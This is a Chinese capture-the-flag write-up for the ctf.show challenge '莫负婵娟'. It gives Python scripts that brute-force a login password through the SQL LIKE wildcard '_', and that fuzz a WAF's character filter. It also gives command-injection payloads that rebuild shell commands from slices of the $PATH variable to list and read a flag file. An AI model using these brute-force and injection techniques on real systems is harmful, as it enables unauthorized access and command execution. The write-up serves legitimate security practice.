# 莫负婵娟

经测试发现 `%` 被WAF，但是 `_` 还可以使用，利用 `_` 爆破密码长度(`_`匹配单个字符)。

<pre class="language-python"><code class="lang-python"><strong>import requests
</strong>
url = "http://6af3f7f0-3a74-41bf-8777-a5efd7344510.chall.ctf.show/login.php"

for i in range(50):
    exp = '_' * i
    payload = {'username': 'yu22x',
               'password': exp}
    headers = {
        'Cookie': 'PHPSESSID=rhnepd32ekcb0r6amr89hhppmk'
    }
    response = requests.request("POST", url, headers=headers, data=payload, files=[])
    if response.text.find('wrong username or password') == -1:
        print(i)
        print(response.text.encode('utf-8'))
</code></pre>

返回结果：

```
32
b'<div align="center">I have filtered all the characters. Why can you come in? get out!</div>'
```

说明密码长度有32位长。写个脚本爆破密码：

```python
import requests
import string

url = "http://6af3f7f0-3a74-41bf-8777-a5efd7344510.chall.ctf.show/login.php"

password = ''
headers = {
    'Cookie': 'PHPSESSID=rhnepd32ekcb0r6amr89hhppmk'
}
files = []

for i in range(32):
    for j in string.digits + string.ascii_letters:
        exp = '_' * (32 - i - 1)
        payload = {'username': 'yu22x',
                   'password': password + j + exp
                   }
        response = requests.request("POST", url=url, headers=headers, data=payload, files=[])
        if response.text.find('wrong username or password') == -1:
            password += j
            break

print(password)
```

爆出来的密码：

```
67815b0c009ee970fe4014abaa3Fa6A0
```

登录之后是一个内部网测试平台，初步推测是SSRF漏洞，尝试穿越目录，发现被waf了。写个脚本，fuzz所有可见字符（注意修改Cookies）：

```python
import string
import requests

url = "http://a9359d73-7931-4f4f-b3f6-1eb0ffa37f5d.chall.ctf.show/P1099.php"

file = open('fuzz.txt', 'w')

for i in string.printable:
    payload = {'ip': i}
    files = [

    ]
    headers = {
        'Cookie': 'UM_distinctid=174a4cad32570e-00904607c43d2f-333769-240000-174a4cad326103d; PHPSESSID=q8f5oki8d5qi9lfvm3l6jmaiq2'
    }
    response = requests.request("POST", url, headers=headers, data=payload, files=files)
    if response.text.find('evil') == -1:
        file.write(i)
```

这个是fuzz.txt文件目录下的字符：

```
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ#$.:;?@_{}~ 
```

由于Linux系统下的大小写敏感，直接使用ls不可以，尝试利用Linux系统下$PATH变量：

<figure><img src="https://1298837596-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUlxElCQcjylbSFsJycU3%2Fuploads%2FEgYkItwTlJpOXRK6FphZ%2F1.png?alt=media&#x26;token=0bae6346-414c-4b5e-953a-c011c1792630" alt=""><figcaption></figcaption></figure>

截取字符串：

<figure><img src="https://1298837596-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUlxElCQcjylbSFsJycU3%2Fuploads%2FBL9rT4FdAzbTGnP9pZaU%2F1.png?alt=media&#x26;token=0d0835da-8240-43aa-aa66-6f8fd176f6cc" alt=""><figcaption></figcaption></figure>

遍历：

```
127.0.0.1;${PATH:5:1}${PATH:2:1}
```

找到有flag文件：

<figure><img src="https://1298837596-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUlxElCQcjylbSFsJycU3%2Fuploads%2FKiSuCPiFQ0s07JUaTu6U%2F1.png?alt=media&#x26;token=26059027-4a6d-4b95-beed-42de0249697a" alt=""><figcaption></figcaption></figure>

读取文件，用 `$cat flag.php` 或者 `$nl flag.txt` 都可以

<figure><img src="https://1298837596-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUlxElCQcjylbSFsJycU3%2Fuploads%2Ft2ArH1On66Ap3SzgKZQN%2F1.png?alt=media&#x26;token=e6ce53de-b3d4-4224-9fd2-31f204a5efe0" alt=""><figcaption></figcaption></figure>

```
127.0.0.1;${PATH:7:1}${PATH:8:1}${PATH:92:1} ????.???
127.0.0.1;${PATH:14:1}${PATH:5:1} ????.???
```